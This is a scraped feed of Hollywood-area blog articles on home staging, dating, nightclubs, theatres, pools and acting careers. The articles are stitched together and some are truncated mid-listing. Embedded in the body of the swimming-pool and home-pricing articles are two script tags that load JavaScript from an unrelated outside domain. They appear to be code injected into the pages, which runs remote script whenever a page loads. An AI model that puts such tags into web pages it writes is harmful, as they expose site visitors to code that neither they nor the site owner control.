<content:encoded><![CDATA[<p>Whether you&#8217;re putting your <a href="http://www.eleganthomesinla.com/community/area/Hollywood+Hills+and+Parts+of+WeHo/">luxury Hollywood Hills home</a> on the market for the first time, or you&#8217;ve been trying to make a sale unsuccessfully and are worried about how long it&#8217;s taking and the price you&#8217;ll end up seeing, staging the home will make a huge impact for you. Learning the ins and outs of <a href="http://www.abouthollywood.com/hollywood-real-estate/price-staging-key-to-selling-your-home-in-a-buyers-market/">staging a luxury home</a> in the Hollywood Hills can make all of the difference in the world. A few general tips and ideas is all you need to get started for yourself, and the results will speak for themselves.</p>
<p>First, you have to change your perspective on your home. Many people try to sell their home and the personal lives they&#8217;ve had in it. However, nobody is interested in what you and/or your family did or looked like in a home, to be brutally honest. Instead, people want to be able to envision themselves, and their own family in the home they decide to purchase. There&#8217;s no question many homes in the Hollywood Hills have personality and depending whether one is deciding to live in <a href="http://www.hollywoodhillswestrealestate.com">Hollywood Hills West</a>, or <a href="http://www.HollywoodHillsEastRealEstate.com">Hollywood Hills East real estate</a> buyers are visioning their future when they preview your home.</p>
<p>Therefore, instead of highlighting personal memories, photographs, mementos and the like, they should actually be removed. This creates a kind of blank canvas for them to work with. Yes, you may not want to show off all your Platinum Records or awards&#8230; Now, a prospective buyer isn&#8217;t clouded in terms of their own vision, nor are they worried about you and your family. They are free to dream and picture themselves, and that leads to more sales in less time.</p>
<p>Another very important thing to remember is that clutter is a killer. Let me repeat that! CLUTTER IS A KILLER! Clutter makes spaces look smaller, not to mention messier and less attractive. This will turn prospective buyers off before they even get started, and they won&#8217;t be able to move past it. Therefore, a crucial aspect of staging luxury homes will be removing all of the clutter. Would you rather remove clutter or potentially lose buyers READY TO WRITE AN OFFER???</p>
<p>Take all loose objects off the floors and away from open spaces. Ideally, anything besides main furniture or other items which serve a specific purpose to the staging process will be removed or hidden from view. You also want to create a well-lit atmosphere that really helps to show how large spaces are, and how inviting they can be.</p>
<p>The right furniture and decor can also make a huge difference in staging a luxury home. For example, you might have very eclectic tastes or a unique flair for how you like your home to look. But the majority of individuals and families from the area won&#8217;t necessarily feel the same way. People expect a <a href="http://www.eleganthomesinla.com">luxury home</a> in the Hills to look and feel a certain way, which means the right kinds of classy furniture and art, the right colors and schemes, and more.</p>
<p>Therefore, properly staging a luxury home in the Hollywood Hills for maximum success often entails moving your furniture and belongings out of there, and bringing in new furniture. Companies can handle this for you, and you&#8217;ll find some people who enjoy the furniture so much, they&#8217;ll even buy that from you too.</p>
<p>Ultimately, there are many different ways to improve the chances of selling your home or getting your ideal asking price. One of the crucial ideas to consider is staging your home, and learning how to stage a luxury home in the Hollywood Hills and throughout Los Angeles will make a dramatic difference in very short order. Use the above tips and ideas to get started, and you&#8217;ll be that much closer to seeing success.</p>

<content:encoded><![CDATA[<p>So you&#8217;ve heard of speed dating, and have considered it, just haven&#8217;t yet taken the action&#8230; For those of you who are unfamiliar with speed dating it&#8217;s when individuals meet at a speed dating location which has others also looking for the right match for them. You&#8217;ll have a bunch of these fast meetings with lots of people to see if there&#8217;s someone you had a quick connection with. For those who are single here in Hollywood or throughout Los Angeles, speed dating maybe just hat you&#8217;re looking for.</p>
<p>The process of speed dating is where lots of guys and girls sit across from each other at tables. They sit at these tables for a certain specified amount of town which can be anywhere from a couple of minutes to maybe as long as 10 minutes as it really depends on the number of individuals participating and the location.</p>
<p>As you&#8217;re sitting with someone during this allotted amount of time, you get the opportunity to meet the other person a little bit. If there&#8217;s some type of connection, you&#8217;ll both sense it. If there&#8217;s little to no interest as well, you&#8217;ll most likely both know it pretty quick. When the time runs out with one person you move over a table and start talking to the next person.</p>
<p>After you speak with each man or woman you&#8217;ll either exchange numbers or let the organizers know who you&#8217;re interested in. If there&#8217;s a mutual interest, you&#8217;ll be put in contact with each other to get together where it&#8217;s now on you in a not so &#8216;speed dating&#8217; way to make an impression.</p>
<p>For some individuals with really busy lives, speed dating is exactly what they need. It&#8217;s not for everyone, but as a great way to meet a bunch of people real quick, this way works well. Lots prefer speed dating over dating sites as it can have direct results and helps you avoid that first date as being a blind date. If there&#8217;s a click between two people, you&#8217;ll both know it immediately and that makes speed dating awesome.</p>
<p>There&#8217;s many speed datings organized by age groups, genders, and religion. So if you&#8217;re looking to date lots of men or women in an hour, this is your opportunity to do it where you don&#8217;t offend anyone and you have a chance of meeting you&#8217;re next love of your life! </p>

<h2>The Happy Ending Bar and Restaurant</h2>
<p>Happy Endings is a lively bar and restaurant with excellent food, a casual, fun crowd, and lots of screens for catching the game.</p>
<p>When you first walk in to Happy Endings you notice the upbeat, sports bar atmosphere, as well as a definite East Coast feel. Owner Sal describes the vibe of Happy Endings as a kind of New York-Los Angeles hybrid.</p>
<p>Happy Endings does embody the fun of those two most exciting cities in that it has something for everybody, all the time. It&#8217;s good for happy hour, lunch, or late night meals and drinks. It&#8217;s a great bar for watching sports events and an excellent place for a casual meal.</p>
<p> Sal says, &#8220;My motto is to bring the hospitality back to Los Angeles. It&#8217;s what a lot of people are looking for.&#8221; The fun, relaxed social setting is a big part of what the place is about. No attitude here, from the staff or the crowd. The people who work at Happy Endings truly want you to have a good time. Bartenders and wait staff are friendly and efficient, even when the place is packed, and drink prices are reasonable.</p>
<p>The drink menu is extensive, varied, and fun. Enjoy a pitcher of Newcastle, Hefeweizen, or Bud light, a bottle of Heineken, a glass of Pinot Grigio, a can of Pabst Blue Ribbon, or a fishbowl of Cherry Rum with lemonade. There&#8217;s a lot to pick from and everybody will find something they like here.</p>
<p>A unique feature is the drink wheel. It&#8217;s a big wheel like you&#8217;d see on a TV game show. Spin the wheel and set what the drink special will be for the next 20 minutes. Maybe you&#8217;ll get your favorite drink for a bargain price. Maybe not, either way you&#8217;ll have fun.</p>
<p>The main room is large, with the bar in the center of the room. This matters when the place gets crowded, which it does on weekends and during big sports events.</p>
<p>Upstairs there is dancing, pool tables, games, and beer pong. Weekend nights the DJ plays top 40, with some old school and electronica thrown in here and there, and keeps the crowd moving. There is also entertainment during the week, including karaoke night with a live band.</p>
<h2>Food at Happy Endings</h2>
<p>Happy Endings is a serious bar, but the food is not an afterthought here. Everything coming out of the kitchen is fresh and homemade. Sal, who describes himself as a &#8220;foodie&#8221; notes that they always use top-grade ingredients and never cut corners. &#8220;We don&#8217;t stray. Our quality stays the same.&#8221; The kitchen is open late seven days a week, so when you&#8217;re out late and want something really good to eat, this is the place.</p>
<p>Among the food choices are burgers, excellent New York style pizza, calzones, sliders, sandwiches, and salads. Happy hour appetizers include bar classics like tacos and buffalo chicken wings, as well as some more unusual choices: fish sticks with lobster bisque dipping sauce, chicken quesadilla made with Jack Daniels barbeque sauce. There are different daily lunch specials every weekday.</p>
<p>There is a private room available for parties and special occasions complete with its own bar and screens</p>

It&#8217;s an upscale place with classy vibes and can hold up to big clubs you would find anywhere in New York, L.A. or Las Vegas.</p>
<h2>Burgundy Room</h2>

Los Angeles, CA 90028<br />
Phone: 323-465-7530</p>
<p>The Burgundy Room is not one of the instant-hot spot, trendy new Hollywood nightclubs, designed as the must-be spot to be &#8220;accidentally&#8221; seen by the paparazzi. Instead, it&#8217;s a fantastic bar and club with a smaller, intimate space, a dark, lounge-like environment, and plenty of drinks to be had.</p>
<p>It&#8217;s more of a dive bar, in the best way, than anything else, especially when compared to the excess and over the top vibes that this or that new Hollywood nightclub provides. A great spot for barhopping or spending a few hours, and much more of a local institution than a touristy, celebrity trap.</p>
<h2>Teddy&#8217;s</h2>
<p>7000 Hollywood Boulevard<br />
Los Angeles, CA 90028<br />
Phone: 323-466-7000<br />
<a href="http://www.thompsonhotels.com/hotels/la/hollywood-roosevelt/drink/teddy%27s" target="_blank">http://www.thompsonhotels.com/hotels/la/hollywood-roosevelt/drink/teddy%27s</a></p>
<p>Teddy&#8217;s, located in the Roosevelt Hotel, by Thompson Hotels, is an exclusive nightclub getaway that&#8217;s all about vintage Hollywood. Glamorous celebrities, classic decor and everything that is Hollywood glory both past and present. Enter the club behind huge, dark bronze doors and open up a new environment that makes this a premier destination not only for the out of towners staying in the hotel, but for the big names and hot parties locally too.</p>
<h2>Industry</h2>
<p>643 N La Cienega Blvd<br />
Los Angeles, CA 90069<br />
Phone: 310-652-2012<br />
Industry Website: <a href="http://www.sbe.com/industry/" target="_blank">http://www.sbe.com/industry/</a></p>
<p>Located where the former Hollywood nightclub Area used to be, Industry keeps some of the traditional elements of that old place but mixes it in with a more upscale club scene. The whole place is covered with blue lights, making a dark and picturesque scene, and while you can try exquisite and unique drinks, classic feel-good, drunk food is available, like pastrami burgers and chili cheese burgers.</p>
<p>There are lots of private little nooks and crannies so you can have any experience you&#8217;d like, ranging from the busy, hopping dance floor, to the tasty food to the intimate backdrops and champagne beverages of a private night.</p>
<h2>MI-6</h2>
<p>9077 Santa Monica Blvd.<br />
Los Angeles, CA 90069<br />
Phone: 310-850-8360<br />
MI-6 Website: <a href="http://clubmi6.com/" target="_blank">http://clubmi6.com/</a></p>
<p>MI-6 was a hit from the first time it opened and joined the fold of the Hollywood nightclubs in the SBE family. With a futuristic setting and James Bond, spy, vibes, this is a huge space with lots of great looking people. You&#8217;ll find plenty of celebrities making their rounds here, which means long lines and huge buzz for everyone else.</p>
<p>There is plenty of eye candy at MI-6, from the celebrities and great looking people to the interesting scenery and furniture, and the nude-movies projected onto walls and ceilings, too. If you can handle the wait, or get on the list, the MI-6 is a Hollywood nightclub that you will probably be frequenting.</p>
<h2>The Abbey</h2>
<p>692 North Robertson Boulevard<br />
West Hollywood, CA 90069<br />
Phone: 310-289-8410<br />
The Abbey Website: <a href="http://www.abbeyfoodandbar.com/" target="_blank">http://www.abbeyfoodandbar.com/</a></p>
<p>The Abbey has now been around for over a decade and a half, and it has continued to grow even better each and every year that passes. It recently underwent another expansion and now offers more than 16,000 square footage of space that appeals to the local scene, the celebrities, the tourists, and any and everyone in between.</p>
<p>The full name of the Abbey is the Abbey Food and Bar, so you&#8217;ll find a top-notch food menu as well as affordable happy hour specials and more, to go along with the thriving DJ party scene every night of the week. Outdoor patios, cabanas and lounges, private VIP areas, and an overall setting like escaping to Renaissance Europe, were it filled with the modern trappings, makes this a fantastic Hollywood nightclub that is continuously improving, too.</p>
<h2>Hyde Lounge</h2>
<p>8029 Sunset Boulevard<br />
Los Angeles, CA 90046<br />
Phone: 323-525-2444<br />
Hyde Lounge Website: <a href="http://www.sbe.com/hydehollywood/" target="_blank">http://www.sbe.com/hydehollywood/</a></p>
<p>Another member of the SBE family, the <a href="http://www.abouthollywood.com/hollywood-nightlife/hyde-lounge-hollywood-nightclub/">Hyde Lounge</a> Hollywood nightclub is a very small, intimate and exclusive space. Better for a private party or a date than experiencing a massive, bumping club atmosphere, Hyde attracts celebrities looking for a quiet but exciting escape, and locals who know the best spots to go.</p>
<p>Opened for just a few years, the decor is dark, rich, upscale and luxurious, and the club has been written about and featured in numerous magazines, newspapers and more. Most Hollywood nightclubs think bigger and crazier is better, but this takes a step back and achieves a great result. There is another Hyde Lounge in the Staples Center.</p>
<p>Of course, you&#8217;ll probably find other <a href="http://www.abouthollywood.com/hollywood-nightlife/">Hollywood nightclubs</a> besides those listed above as well. But starting with this guide and list, you&#8217;ll know where to go to match whatever mood you&#8217;re in, whichever person you&#8217;re with, and whatever you&#8217;re trying to do for an evening. Pick the Hollywood nightclub (or two, or three, or four&#8230;) that suits you best and have a blast!</p>

<content:encoded><![CDATA[<p><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/senior-dating-150x150.jpg" alt="Mature couple having a nice date with white wine" title="Mature couple dining and toasting in fancy restaurant." width="150" height="150" class="alignleft size-thumbnail wp-image-1822" />The words &#8220;dating&#8221; and &#8220;senior&#8221; are two words that might not seem to go together in the minds of many, but as youthful as today&#8217;s baby boomers are, dating for senior singles is very much a reality. There are many reasons as to why seniors want to date. The first reason is because people are living longer. This leaves a group a seniors that might find themselves alone due to the death of their spouse. But along with this, increased longevity also means that people have more options, and are less inclined to stay in marriages that aren&#8217;t working. This is especially true for women. Baby boomer women are extremely independent, and they don&#8217;t need to stay in a marriage to protect themselves financially, or to feel needed or fulfilled as a woman. Therefore, these women have no problem divorcing, even after many years of marriage. They know exactly what they want from life and themselves, and they have no problem with pursuing other senior singles for senior dating.</p>
<p>Men are finding themselves becoming senior singles as well. Men moreso than women want to go right into new marriages or relationships and they&#8217;ll have no problem looking for a new mate. Many senior men nowadays want and desire a woman their own age, because today&#8217;s senior women are a lot more youthful than the senior women in generations past. As such, they will want to seek them out on various websites such as maturesinglesonly.com. These websites are dating website where the person can choose who they&#8217;d like to get to know, and to what extent they&#8217;d like to get to know them.</p>
<p>Sometimes senior singles aren&#8217;t looking to get remarried. In many cases, they&#8217;d simply like to find someone to go out to diner with, or to escort them around town, and to keep them company. There are dating sites that allow senior dating for all sorts of reasons, including meeting a great companion. There are sites such as seniorsdatingadvice.com that gives advice as to where mature and senior singles can meet each other. There is also gather.com, where senior dating can be arranged online.</p>
<p>The biggest challenge for the senior single, is to figure out how they go about meeting people in this new world. When they were younger, people got married right out of high school or college. There wasn&#8217;t a pervasive dating culture like there is now. There weren&#8217;t whole generations of singles who were available for dating. However, these dating sites, as well as others, can help mature singles get used to how things are done now, and how to feel good about themselves when they are on their romantic, or friendship search.</p>

<content:encoded><![CDATA[<p><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/pool-150x150.jpg" alt="Laying out by the pool catching sun" title="Girl enjoying sun and relaxing by the pool" width="150" height="150" class="alignleft size-thumbnail wp-image-1816" />One thing you may want to consider when purchasing <a href="http://www.abouthollywood.com/hollywood-real-estate/">Hollywood Real Estate</a> is whether or not you&#8217;d like a swimming pool. As the weather in Los Angeles is known to be beautiful year round, owning a swimming pool can provide for you an excellent way to exercise on a daily basis, relax, and just enjoy yourself! Swimming pools come in many different shapes, types and sizes. There&#8217;s a bunch of things which you&#8217;ll be required to own with your pool including a water pump, basin, the water filter, returns, drains, chemical feeder, as well as the proper type of plumbing system to transport the water in the swimming pool.</p>
<p>There&#8217;s various types of swimming pools if you&#8217;re in the market of owning one, which are available, depending on the basin structure for you to choose from. These include everything from above ground swimming pools to fiberglass pools. </p>
<h2>Above Ground, Fiberglass and Infinity Pools</h2>
<p>Above ground pools are known to be the cheapest to purchase, and in many ways the simplest to build. They are available in pre-made kits. If you&#8217;re looking for many years worth of use with your swimming pool and are looking at the pool more as a greater addition to your owned real estate then you may want to consider a Fiberglass pool. If you live in the <a href="http://www.abouthollywood.com/hollywood-neighborhoods/hollywood-hills/">Hollywood Hills</a>, you may want to look at purchasing an Infinity edge pool. These pools create an effect as if the water is vanishing or extending into infinity.<br />
<center><br />
<SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-jm70"> </SCRIPT></center></p>
<p>If you&#8217;re looking for the cheapest type of in-ground pool, you&#8217;ll want to look at Vinyl lined swimming pools, though one of the negative drawbacks is every 10 years (give or take), you&#8217;ll need to replace the liner. </p>
<p>If purchasing a pool isn&#8217;t an option, there are always public pools. In <a href="http://www.abouthollywood.com/">Hollywood</a>, the YMCA is one such facility, in which it&#8217;s indoors and heated. There&#8217;s also plenty of places to go in the Hollywood area for those who enjoy swimming outside. </p>
<p>Did you know that swimming works practically every one of your muscles, and is considered one of the top exercises. In an exercise pool you can perform many different types of activities including water yoga, water toning, jogging and other water aerobic workouts. </p>
<p>Swimming pools on a regular basis need to be treated with various pool chemicals on a daily basis and it&#8217;s essential for the chemicals to stay balanced. If not, not only can this damage the H2O, but it can cause skin irritation and is not good for your eyes. Water purification is essential in maintaining the proper health of your skin.</p>
<p>Owning a swimming pool can absolutely help in a positive way the property value of your home whether you own <a href="http://www.abouthollywood.com/hollywood-real-estate/">Hollywood Real Estate</a> or any form of property. You&#8217;ll have to think before purchasing either a pool or home with a swimming pool of all safety issues and make sure your pool has a gate and is protected from young toddlers or children. If you&#8217;re going to maintain your pool on a daily basis, make sure you keep it safe and clean. If your hours don&#8217;t make it easy for this to be the case, there are plenty of pool maintenance services available which will come on a regular basis to clean your pool and make sure the levels are good. </p>

<content:encoded><![CDATA[<p>Ready for a news flash? The <a href="http://www.abouthollywood.com/hollywood-real-estate/">Real Estate</a> industry is in a Buyer’s Market. If you currently have your home on the market or have been contemplating selling, you no doubt already know this, and you’re kidding yourself if you think your potential buyers don’t know it too.</p>
<p>But just because you can’t get the same price for your house today that you could’ve gotten at the height of the market, it doesn’t mean you can’t <a href="http://www.abouthollywood.com/hollywood-real-estate/ten-signs-that-its-time-to-sell-your-home-hollywood-real-estate/">sell it quickly </a>and for a great price. The secret? Creating a sense of urgency. </p>
<p>Today buyers have many choices and – according to a recent article in the <a href="http://www.latimes.com/business/realestate/la-fi-umberger-20110102,0,6685941.story" target="_blank">Los Angeles Times</a> – they may have even more to choose from as the banks flood the market with a new wave of REOs in 2011. With prices down and inventory up, buyers are no longer in much of a hurry to make an offer. Back in the heyday, bidding wars seemed to be the norm and many sellers had multiple over-asking offers within hours of putting the “For Sale” sign up in their yard. Now this type of frantic buying is definitely the exception rather than the rule. So if you want to decrease the time your home sits on the market and increase the sales price, you will have to create a sense of urgency that pushes buyers to make an offer, rather than just sit back and wait for your first (or second or third) price reduction.</p>
<p>There are two ways to create urgency in today’s market: <strong>Price and Presentation</strong>. One without the other isn’t enough – it must be a combination of both.</p>
<p>Gary Keller, Chairman of <a href="http://www.kw.com/kw/" target="_blank">Keller Williams Realty</a> and author of “Shift: How Top Real Estate Agents Tackle Tough Times,” described it best when he said, “Price Gets You Interest. Staging it gets you offers.” </p>
<h2>Price</h2>
<p>If you’re going to be a successful home seller, you must be realistic. Prices are no longer what they were a few years back. If your Realtor shows you valid comps that say your home is currently worth $600,000, there is no amount of wishful thinking that will make a buyer pay $700,000 for it in today’s market. I see this a lot – Agent A advises Seller on a reasonable price for the home. Seller is shocked and insists on listing the home for more. If Agent A doesn’t agree, Seller moves on to Agent B who will put the home on the market for whatever price Seller hopes to get, just to get the listing. </p>
<p>Can you guess what happens next? The home doesn’t sell. It may get a few offers (probably around the price Agent A first recommended), but they are considered to be “lowball” offers by Seller and rejected. After a month or two, Agent B recommends a significant price reduction AND asks the seller to invest in staging the property to bring in more offers. Seller is now in the position of both having to lower his price AND invest money in Staging a property whose days on market (DOM) have crept up to at least 60. </p>
<p>What has the seller lost by postponing the inevitable by 2 months?</p>
<p><b>1) The Buzz Period</b><br />
The first two weeks after a property hits the market are the most active. Anyone currently searching for a property in that area and in that price range is alerted by his Realtor that there is a new listing on the market. The listing agent holds a Broker’s Open House for local agents to preview the home to see if it meets their buyers’ criteria. Those agents bring their sellers by for a walk-through. The agent also holds a Public Open House where any other potential buyers (as well as nosy neighbors) come to see the house. Second showings are scheduled and interested buyers make offers. Once the DOM begins to creep up, that property is considered stale. Fewer buyers come to see it, and even fewer make offers. Without a substantial price reduction, it is unlikely to get much action.</p>
<p><b>2) Carrying Costs</b><br />
Sellers who overprice their homes often overlook the costs of maintaining that property while it sits on the market. There’s the mortgage of course (and possibly a second mortgage if they’ve already bought another home), insurance, lawn care, cleaning, HOA dues, utilities, etc. The longer the home stays on the market, the more money it costs the seller. Those costs must be factored in when pricing the home to sell.</p>
<p>And what can a seller gain by pricing a home competitively to begin with? S/he will create that sense of urgency we discussed. </p>
<p>If buyers perceive that a home is listed for an already competitive price (versus at or above market value), they are much more likely to move quickly to make an offer. Despite the market slump, everyone knows that eventually <a href="http://www.abouthollywood.com/hollywood-real-estate/">real estate</a> will rebound. And if your buyer is looking for a long-term investment or plans to live in the home for at least five years, s/he will have time to wait that out. If a home is perceived as a good value for the money, savvy buyers know they will not be the only ones interested and will be quicker to write an offer.<br />
<br />
<center><br />
<SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-jm71"> </SCRIPT></center><br />
</p>
<h2>Presentation/Staging</h2>
<p>The second way to create a sense of urgency with buyers is to make your home stand out from the competition. The best way to do that is with Home Staging.</p>
<p>Home buyers may see 5-10 properties in a day when they are actively searching for a new home. <strong>If yours doesn’t stand out from the fray, it is unlikely a buyer will remember it when it comes down to making an offer. </strong></p>
<p>To ensure a quick sale, buyers have to fall in love with your home from the moment they walk through the door. Without that kind of emotional connection, your house will be just one of many a buyer might consider based on price, condition and location. BUT<em> if a buyer walks into your staged home and immediately begins to “mentally move in,” envisioning herself and her family living in – and loving – your home, you can be sure an offer will follow.</em></p>
<p>Let’s look at an example:<br /><center><br />
<div id="attachment_1789" class="wp-caption alignnone" style="width: 442px"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo1.jpg" alt="Home Staging - Empty Hardwood floor room" title="Home Staging" width="432" height="324" class="size-full wp-image-1789" /><p class="wp-caption-text">From looking at this photo, can you tell what kind of room this is? Do you get an idea for the size of the space and how you might lay out your furniture? Probably not. </p></div></p>
<p> <div id="attachment_1792" class="wp-caption alignnone" style="width: 442px"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo2-300x225.jpg" alt="Drastic change in room being staged" title="After photo of room being staged" width="432" height="324" class="size-medium wp-image-1792" /><p class="wp-caption-text">What about now? Would you remember this guest bedroom after a long day of viewing properties? I’ll venture to guess you would.</p></div></center></p>
<p>Vacant properties feel cold and uninviting. It’s very difficult for most buyers to envision how they would place their furniture in an empty room. Not to mention, when a room is empty all you can focus on are the floors and walls, so every little scratch and ding will be noticeable. With properly scaled pieces and an appropriate furniture plan, rooms feel spacious and functional and buyers are more likely to make an offer.</p>
<p>“But what about MY house that I’m living in with all of MY furniture,” you ask? “Can that also benefit from Staging?”</p>
<p>Let’s take a look and see before and after photos:<br />
<center><br />
<div id="attachment_1794" class="wp-caption alignnone" style="width: 442px"><a href="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo3.jpg"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo3-300x225.jpg" alt="Hardwood floors and living room furniture in house before being staged" title="Before photo of room in house before being staged" width="432" height="324" class="size-medium wp-image-1794" /></a><p class="wp-caption-text">This is a nice and sunny room that feels fairly spacious, but it also looks like a lot of other family rooms. There’s no coherent color scheme, so the eye gets confused and can’t figure out where to look. The art on the wall is so light that it doesn’t stand out against the lightly colored walls. </p></div> <div id="attachment_1795" class="wp-caption alignnone" style="width: 442px"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo4-300x225.jpg" alt="A photo following some staging using some of the owners furniture" title="Home Staging after photo" width="432" height="324" class="size-medium wp-image-1795" /><p class="wp-caption-text">Using the home owner’s sofa, loveseat, chair and rug, we were able to enhance this room by tying everything together with a darker accent color in the art, throw pillows and occasional tables. Which of these rooms would you remember at the end of a long day of house hunting?</p></div></center></p>
<p>OK, but that wasn’t fair – we brought in accent tables and lamps for that house. What if we could only use the furniture that was already in the home to begin with?</p>
<p><center><br />
<div id="attachment_1806" class="wp-caption alignnone" style="width: 464px"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo5.jpg" alt="A messy kids room before being staged" title="Messy Kids Room" width="454" height="340" class="size-full wp-image-1806" /><p class="wp-caption-text">Here’s a typical family home. Looks pretty much like my kids’ rooms on any given day.</p></div><br />
<div id="attachment_1807" class="wp-caption alignnone" style="width: 442px"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/staging-photo6.jpg" alt="Kids bedroom after being staged with furniture " title="Kids Bedroom following being staged" width="432" height="324" class="size-full wp-image-1807" /><p class="wp-caption-text">We brought in that leather chair from the living room. The rest was just clearing out the junk and accessorizing. No doubt which of these rooms is more appealing!</p></div></center></p>
<p>But does all this work (oh, yes it does require a bit of elbow grease) and money spent on staging really pay off?</p>
<h2>Real Estate Staging Association (RESA)</h2>
<p>According to the Real Estate Staging Association (RESA) statistics, staged homes sell in 78% less time than homes that are not staged. And according to <a href="http://blog.homegain.com/homegain/homegain-2011-home-improvement-national-survey-results/" target="_blank">HomeGain’s 2011 Home Improvement Survey</a> results, staging yields a 299% return on your investment dollar. I’d say that’s a pretty good payoff.</p>

<content:encoded><![CDATA[<p><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/whos-who-acting-300x200.jpg" alt="Actor on casting call with director" title="whos who acting" width="300" height="200" class="alignleft size-medium wp-image-1754" />During the course of your acting career, you will be meeting and working with lots of individuals. In many cases these individuals will either have a direct or indirect role on your career as an actor. Some are more influential then others. Here&#8217;s a list of some of the key individuals you&#8217;ll most likely have part of your life if you are devoted and plan on making a career of acting.</p>
<h2>Your Agent</h2>
<p>Your agent will have one of the most important effects on your <a href="http://www.abouthollywood.com/hollywood-actors/">acting career</a>. Whether you have a good relationship or a very dry relationship with your agent, you will need to have this person in your life. An agent is a third party who finds &#038; secures work for you, and receives an agent commission of roughly 10 &#8211; 15% of the gross earnings of each job. Your agent is so influential as they are your mouthpiece to the business and others. A good agent is a master at communicating, and negotiating. Your agent will work on the required contract terms for the roles they help you land, and work on getting you the best amount of income possible. If your agent is good they will have your best interests in mind. Bad agents are only concerned with their wallets and not your long-term career. Don&#8217;t ever feel you cannot ask questions as an agent works with and for you. </p>
<h2>The Casting Director</h2>
<p>The Casting Director is a vital part of your career, as they can make or break you. The casting directors are hired to secure talent for movies, TV shows, theatrical shows, and most forms of entertainment which require actors. This person is your agents most important direct line of contact when trying to get you a job. Your agent will be sending this person your <a href="http://www.abouthollywood.com/hollywood-actors/making-your-acting-resume/">headshots and acting resume</a>, and if you seem like the right match for a character that is being casted for, your agent will most likely get contacted by this casting director to schedule an audition. Prepare yourself the best you can. If a script is sent in advance, practice your lines. If not, practice cold reading as you&#8217;ll be put on the spot. If the casting director has specific instructions for your audition, make sure you plan accordingly and always show up to your audition early. Being late may not only have you lose this audition, but impact your career on future casting calls.</p>
<h2>A Talent Manager</h2>
<p>A talent manager also is a very important person towards your career. A manager plays a much different (yet similar) role of an agent. This person is your advisor and works on building your career. In many cases an agent may receive multiple offers or opportunities, and unless you have someone who is working for you and has your best interests in mind, you may find yourself doing roles which can be damaging to your career. The manager looks at the bigger picture of your long term career, where the agent is working more on the contracts. </p>
<h2>The Producer</h2>
<p>And last, as you start securing work you&#8217;ll have the opportunity of working with the Producer. The Producer is responsible for all the logistics behind the movie or show that you&#8217;ll be part of. They hire and bring together all the necessary personalities to make the production a success. This includes directors, writers, additional producers with various titles, music supervisors, additional crew and all the actors. You&#8217;ll want to build a good rapport with the Producer if given the opportunity. </p>
<p>Your acting career will be filled with many individuals who will become influential in your career. From photographers who work on your <a href="http://www.abouthollywood.com/hollywood-actors/easy-steps-to-a-great-headshot/">headshots</a>, to all the individuals listed above. Make sure to take the time to build the right team of individuals to help you get to the next level. </p>
<p><a href="http://www.abouthollywood.com">Hollywood</a> is filled with many good and horrible managers, agents, and producers. Take the time to learn about their reputation. Don&#8217;t be so anxious and eager to sign anything without discussing it first with an attorney. We wish you the best of luck on your journey! </p>

With beautiful, standout architecture and all of the history you could ask for, a trip to Grauman&#8217;s isn&#8217;t just about seeing a movie, it&#8217;s an experience that everyone in the area, locals and tourists alike, flock to take in. It was renovated within the last decade to make it more amenity-rich, but the best features are the classics, like the courtyard filled with handprints, footprints and signatures of the <a href="http://www.abouthollywood.com">brightest Hollywood stars</a> and luminaries over the decades.</p>

<h2>El Capitan Theatre</h2>

<p>Opened originally way back in May of 1926 and known as &#8220;Hollywood&#8217;s First Home of Spoken Drama&#8221;, the El Capitan is a grand, elegant and classic Hollywood theatre unlike any other. Operated by Walt Disney, it serves as the exclusive first run theatre for Disney films, and was reopened in 1991 after a two year break for a massive renovation.</p>
<h3>Next door to Jimmy Kimmel Live!</h3>
<p>The first film shown at the reopening was the world premiere of The Rocketeer, and as mentioned, this Hollywood theatre is still the home of many of Disney&#8217;s premieres and exclusive showing and events. The theater, not always known as El Capitan, features a Disney store and shop, special exhibits and much more. It&#8217;s next-door to Jimmy Kimmel Live!</p>
<h2>Pantages Theater</h2>
<p>6233 Hollywood Boulevard<br />
Los Angeles, CA 90028<br />
Web: <a href="http://www.pantages-theater.com/pantages_theater_los_angeles.php" target="_blank">http://www.pantages-theater.com/pantages_theater_los_angeles.php</a><br />
Phone:323-468-1770<br />
Parking: Parking lots and limited street parking nearby</p>
<p>The Pantages Theater, with a long and storied history dating back to 1930, remains one of the best destinations in the area for Broadway plays and other artistic and theatrical events. Even by the standards of other Hollywood theaters, this serves a massive audience, with roughly 2,700 seats.</p>
<p>The theater features an always changing rotation of plays and performances and features a beautiful and opulent stage, decor and seating area that makes it a favorite location for both the performers and the audience. Last renovated in 1977, Pantages remains a classic, and an ideal location for viewing the latest Broadway hit to make it to the West coast.</p>
<p><div id="attachment_1768" class="wp-caption alignleft" style="width: 160px"><img src="http://www.abouthollywood.com/wp-content/uploads/2011/01/kodak-theatre-150x150.jpg" alt="outside the kodak theatre" title="kodak theatre" width="150" height="150" class="size-thumbnail wp-image-1768" /><p class="wp-caption-text">© Susy56 | Dreamstime.com</p></div><br />
<h2>Kodak Theatre</h2>
<p>6801 Hollywood Boulevard<br />
Hollywood, CA 90028<br />
Web: <a href="http://www.kodaktheatre.com/" target="_blank">http://www.kodaktheatre.com/</a><br />
Phone: 323-308-6300<br />
Parking: Parking available at adjacent locations including lots with discounted rates</p>
<p>Unlike the historic Hollywood theaters that the Kodak Theatre lays adjacent to and in the midst of, the Kodak is brand new, having opened in 2001. That doesn&#8217;t mean it isn&#8217;t prestigious and well known, and it&#8217;s actually the first and only permanent home of the Academy Awards, and has served as the location for a variety of other famous live events and ceremonies.</p>
<p>The Kodak Hollywood theatre sits about 3,400 individuals, making it an ideal mix between a large theater for events without making it too massive or off-putting. The inside of the theater is fantastically and extravagantly adorned, making for a very unique and elegant experience. Several major events are held yearly for varying periods of time.</p>
<h2>Egyptian Theatre</h2>
<p>6712 Hollywood Boulevard<br />
Los Angeles, CA 90028-4605<br />
